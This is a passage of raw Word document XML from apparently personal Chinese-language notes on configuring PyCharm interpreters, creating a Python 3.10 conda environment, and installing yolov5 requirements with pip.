    <w:p w14:paraId="30ABB49B" w14:textId="176CF393" w:rsidR="0031365A" w:rsidRDefault="0031365A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5637">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>目前我指定虚拟解释器的</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5637">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5637">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>环境路径</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5637">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5637">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>直接</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5637">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5637">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">install -r requirements.txt </w:t>
      </w:r>
      <w:r w:rsidR="00CC5637">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>失败，推测</w:t>
      </w:r>
      <w:r w:rsidR="00CC5637">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>requirements</w:t>
      </w:r>
      <w:r w:rsidR="00CC5637">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的版本不太对，</w:t>
      </w:r>
      <w:r w:rsidR="002542B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidR="00CC5637">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pycharm</w:t>
      </w:r>
      <w:r w:rsidR="00CC5637">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>不支持的</w:t>
      </w:r>
      <w:r w:rsidR="002542B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>包</w:t>
      </w:r>
      <w:r w:rsidR="00CC5637">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A23116" w14:textId="77777777" w:rsidR="0031365A" w:rsidRDefault="0031365A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2918A401" w14:textId="131B79A6" w:rsidR="0031365A" w:rsidRDefault="0031365A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是我是用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pycharm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解释器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>手动安装包是可以的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA08341" w14:textId="02AB140D" w:rsidR="0031365A" w:rsidRDefault="00CC5637" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此处也容易显示版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B77768" w14:textId="70D58C03" w:rsidR="0031365A" w:rsidRDefault="0031365A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0031365A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35749B62" wp14:editId="2D2C2C5F">
            <wp:extent cx="3645532" cy="1873679"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="790532610" name="图片 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32610" name="图片 1" descr="电脑萤幕的截图&#10;&#10;描述已自动生成"/>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648307" cy="1875105"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5024AB7C" w14:textId="3DAA807B" w:rsidR="0031365A" w:rsidRDefault="00CC5637" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B1B157F" wp14:editId="12705364">
            <wp:extent cx="2667185" cy="2041973"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="105097838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78380" name="图片 1" descr="图形用户界面, 应用程序&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId287"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2668720" cy="2043148"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="655310F0" w14:textId="77777777" w:rsidR="00CC5637" w:rsidRDefault="00CC5637" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62DC83CF" w14:textId="32183B76" w:rsidR="00CC5637" w:rsidRDefault="00CC5637" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="834" w:name="_Toc159780254"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功解决虚拟环境运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>django</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目</w:t>
      </w:r>
      <w:bookmarkEnd w:id="834"/>
    </w:p>
    <w:p w14:paraId="279B9C2B" w14:textId="77777777" w:rsidR="00CC5637" w:rsidRDefault="00CC5637" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B71AE72" w14:textId="3B8279E9" w:rsidR="00CC5637" w:rsidRPr="00CC5637" w:rsidRDefault="00CC5637" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以正常启动</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06848B5A" w14:textId="37910060" w:rsidR="00CC5637" w:rsidRDefault="00CC5637" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50C83D77" wp14:editId="652400F3">
            <wp:extent cx="3198678" cy="2055688"/>
            <wp:effectExtent l="0" t="0" r="1905" b="1905"/>
            <wp:docPr id="947114707" name="图片 1" descr="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14707" name="图片 1" descr="屏幕的截图&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId288"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3199985" cy="2056528"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D9CBFA" w14:textId="77777777" w:rsidR="00CC5637" w:rsidRDefault="00CC5637" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41497A3E" w14:textId="3594FD21" w:rsidR="00CC5637" w:rsidRDefault="00BF3948" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="835" w:name="_Toc159780255"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>结合</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>conda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建新版本的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解释器并配置到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pycharm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="835"/>
    </w:p>
    <w:p w14:paraId="2F039E3D" w14:textId="6946C5F2" w:rsidR="009340CF" w:rsidRPr="009340CF" w:rsidRDefault="009340CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009340CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>我思考了下，</w:t>
      </w:r>
      <w:r w:rsidRPr="009340CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pycharm</w:t>
      </w:r>
      <w:r w:rsidRPr="009340CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>本身无法直接下载</w:t>
      </w:r>
      <w:r w:rsidRPr="009340CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>python3</w:t>
      </w:r>
      <w:r w:rsidRPr="009340CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的不同版本，而手动从</w:t>
      </w:r>
      <w:r w:rsidRPr="009340CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r w:rsidRPr="009340CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>官网下载不同的</w:t>
      </w:r>
      <w:r w:rsidRPr="009340CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="009340CF">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ython3</w:t>
      </w:r>
      <w:r w:rsidRPr="009340CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>版本，操作还是太麻烦。此处依赖</w:t>
      </w:r>
      <w:r w:rsidRPr="009340CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>conda</w:t>
      </w:r>
      <w:r w:rsidRPr="009340CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>能自动下载不同</w:t>
      </w:r>
      <w:r w:rsidRPr="009340CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r w:rsidRPr="009340CF">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="009340CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>版本，以及</w:t>
      </w:r>
      <w:r w:rsidRPr="009340CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pycharm</w:t>
      </w:r>
      <w:r w:rsidRPr="009340CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>可以指定</w:t>
      </w:r>
      <w:r w:rsidRPr="009340CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>conda</w:t>
      </w:r>
      <w:r w:rsidRPr="009340CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>下载的</w:t>
      </w:r>
      <w:r w:rsidRPr="009340CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r w:rsidRPr="009340CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>复制解释器到不同的项目，并处理不同的包依赖，可以使得调试不同项目的</w:t>
      </w:r>
      <w:r w:rsidRPr="009340CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r w:rsidRPr="009340CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>解释器版本、包依赖相对分离。唯一缺点就是，软件重复程序冗余程度较高，但是这是</w:t>
      </w:r>
      <w:r w:rsidRPr="009340CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pip</w:t>
      </w:r>
      <w:r w:rsidRPr="009340CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>自身设计的问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5E8957" w14:textId="77777777" w:rsidR="009340CF" w:rsidRDefault="009340CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20408C85" w14:textId="77777777" w:rsidR="009340CF" w:rsidRDefault="009340CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07BA9FCE" w14:textId="4B7A3787" w:rsidR="00BF3948" w:rsidRDefault="00BF3948" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不清楚为什么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pycharm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接加载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>conda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的解释器，会出现各种网络问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666A7AE2" w14:textId="77777777" w:rsidR="00BF3948" w:rsidRDefault="00BF3948" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78803761" w14:textId="7FF3D69E" w:rsidR="00BF3948" w:rsidRDefault="00BF3948" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因此手动执行命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE12E69" w14:textId="0FC270D2" w:rsidR="00BF3948" w:rsidRPr="00543AA8" w:rsidRDefault="00BF3948" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00543AA8">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>conda.exe create -p E:\anaconda3\envs\yolov5\envs -y python=3.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EC3172" w14:textId="6AC60605" w:rsidR="00BF3948" w:rsidRDefault="00955410" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（若此命令出现网络问题，参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>conda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的安装、运行一节的报错处理）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030651CB" w14:textId="77777777" w:rsidR="00955410" w:rsidRDefault="00955410" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E6D8682" w14:textId="2604DA02" w:rsidR="00BF3948" w:rsidRDefault="00BF3948" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pycharm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加该环境下的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>venv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解释器（非</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>conda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A65169B" w14:textId="77777777" w:rsidR="00BF3948" w:rsidRDefault="00BF3948" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7696C9B2" w14:textId="15FD91DE" w:rsidR="00BF3948" w:rsidRDefault="00BF3948" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BD1B216" wp14:editId="4A9B5919">
            <wp:extent cx="5274310" cy="2832100"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="431377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77518" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId289"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2832100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F9065F" w14:textId="77777777" w:rsidR="00CC5637" w:rsidRDefault="00CC5637" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70D2B808" w14:textId="0913029D" w:rsidR="00CC5637" w:rsidRDefault="00BF3948" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相当于，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>conda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的目录下弄了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r>
        <w:t>3.10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后又在这个代码项目下的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>env</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复制了解释器，和弄了包依赖的东西</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769C4C5D" w14:textId="77777777" w:rsidR="00BF3948" w:rsidRDefault="00BF3948" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A43D1F0" w14:textId="1CB7A035" w:rsidR="00BF3948" w:rsidRDefault="000E7368" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后手动执行命令</w:t>
      </w:r>
      <w:r w:rsidR="00C4756E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（用户加目录下的</w:t>
      </w:r>
      <w:r w:rsidR="00C4756E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pip</w:t>
      </w:r>
      <w:r w:rsidR="00C4756E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的换源配置文件有效）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB5447C" w14:textId="213E0B8A" w:rsidR="000E7368" w:rsidRPr="00543AA8" w:rsidRDefault="000E7368" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00543AA8">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>python -m pip install -r C:\Users\ranja\Desktop\ToStudy\yolov5\requirements.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C14F3B" w14:textId="629D50BD" w:rsidR="000E7368" w:rsidRDefault="00F40F71" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="482F5E84" wp14:editId="18DAC521">
            <wp:extent cx="5274310" cy="1854835"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1854070720" name="图片 1"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70720" name="图片 1" descr="图片包含 日程表&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId290"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1854835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DA7FCF" w14:textId="77777777" w:rsidR="000E7368" w:rsidRDefault="000E7368" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27BA8E9D" w14:textId="13FB8A52" w:rsidR="00955410" w:rsidRDefault="00955410" w:rsidP="009222EB">
